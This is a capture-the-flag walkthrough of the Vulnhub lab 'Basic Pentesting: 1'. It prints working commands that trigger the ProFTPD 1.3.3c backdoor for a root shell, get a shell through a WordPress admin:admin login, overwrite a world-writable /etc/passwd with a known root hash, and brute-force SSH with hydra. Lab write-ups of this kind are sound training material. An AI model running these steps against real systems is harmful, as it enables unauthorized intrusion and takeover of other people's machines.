CTF Walkthrough - Basic Pentesting: 1


Information

Intro

According to the Vulnhub description, this machine is intended to newcomers. It has different ways to get to the goal (rooting the machine). The machine is pretty realistic (I have found similar scenarios on real life pentestings), which makes it… Well, not amusing. But still, it’s nice for beginners to practice!

Walkthrough

Identification and Enumeration

The first thing to do is identify the target IP. Luckily it answers to ping requests, so a simple fping will make it:

[email protected]:~# fping -aqg 192.168.10.0/24
[...]
192.168.10.195

After some seconds, fping spits a handful of IPs. The only unknown address in that list is 192.168.10.195, which should be my new guest, and my target IP.

Then, as always, nmap is used to get all of the information about the services running in the machine.

nmap -sT -p- -A -vvv -oA nmap 192.168.10.195
[...]
PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack ProFTPD 1.3.3c
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))

FTP

The first thing to notice is that ProFTPD 1.3.3c is a backdoored version (found using searchsploit). The package distribution was compromised by an attacker, distributing a compromised version of the software. Not cool! The full compromise report can be found here.

Luckily for us, we don’t need to defend the machine, but attack it. Of course, this backdoor is completely documented, and we can make use of it. The manual PoC is really simple (the full information may be found here), so let’s try it:

[email protected]:~# nc 192.168.10.195 21
220 ProFTPD 1.3.3c Server (vtcsec) [192.168.10.195]
HELP ACIDBITCHEZ
id;
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

That was fast, root in a few minutes. But this machine isn’t over!

Of course, we can also make use of this backdoor using Metasploit, which take us the need for searching the manual PoC. Given my environment, the default Metasploit payload for this case (cmd/unix/reverse on port 4444) works for me, so this is also a super easy job:

Root using Metasploit

FTP successfully completed!

HTTP

Now this is where this machine starts to get interesting. nmap detects an Apache on port 80, let’s see:

Apache's "It works!"

Well, not too impressive. Maybe there’s something else on the web server…

[email protected]:~# dirb 'http://192.168.10.195'

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Apr  8 22:38:47 2018
URL_BASE: http://192.168.10.195/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.10.195/ ----
+ http://192.168.10.195/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://192.168.10.195/secret/

[...]

A secret directory, that’s better. This path contains a Wordpress blog, with the default “Hello world!” post. Maybe the administration login panel is found on the default location, wp-login?

Wordpress login panel

It is! However, something important happened. The URL is not an IP anymore, the browser followed a redirection to http://vtsec/secret/wp-login. In my network, I don’t need to make further adjustments, as my DNS/DHCP server handles the situation correctly, and resolves the hostname of the VM to the actual IP. When this isn’t the case, a new entry in /etc/hosts should be added, so the web application works correctly.

Of course, the first thing to try here is the classical h4x0r technique: login with admin:admin. And it works!

Now, as the admin username has actual administration privileges, the easiest thing to do is using a Metasploit module to make use of this permissions and get code execution on the server:

Meterpreter from Wordpress

We have a shell with limited permissions (user www-data), so we need to find a way to escalate privileges in the machine. First of all, let’s retrieve /etc/passwd, just in case:

[email protected]:$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
[... system users ...]
marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
[... more system users ...]

There is a single non-system user (besides of root), marlinspike. I’ll make note of it, just in case.

Something else should be noted here. These are the permissions of the file /etc/passwd:

[email protected]:$ ls -lah /etc/passwd
-rw-rw-rw- 1 root root 2.4K Nov 16 13:02 /etc/passwd

The file is world-writable! Usually, UNIX systems divide the user login information in two files:

So, if we can write on /etc/passwd, it means we can set the password for any user, even if it has been previously set on /etc/shadow. Even the root user! First of all, we need to generate a password hash (using a salt):

[email protected]:~# mkpasswd -5 delicious oatmeals
$1$oatmeals$zt2BfPPpVxqgikzNDxQRb1

Then, we change the root entry, so the x in the password field is replaced by our delicious hashed password:

[email protected]:$ cat /etc/passwd | sed 's/root:x/root:$1$oatmeals$zt2BfPPpVxqgikzNDxQRb1/' > /etc/passwd
[email protected]tcsec:$ cat /etc/passwd
root:$1$oatmeals$zt2BfPPpVxqgikzNDxQRb1:0:0:root:/root:/bin/bash
[... more users ...]

And then…

Shell privilege escalation

We got root!

SSH

There is one more service running in the machine: SSH. However, the installed version does not appear vulnerable

We made note of an existing user, though. And password login is enabled, there is no need of finding a private key. What if…

SSH hydra login

Bingo!

Privilege escalation process would be exactly the same, as the user marlinspike can also write on /etc/passwd.

Final words

As its name establishes, this is a basic boot2root machine intended for beginner practice. It shows different ways to get into a vulnerable machine, which may be useful for your day-to-day pentesting operation. For more advanced pentesters, this is not the funniest machine to pwn.

All done here, have a nice day!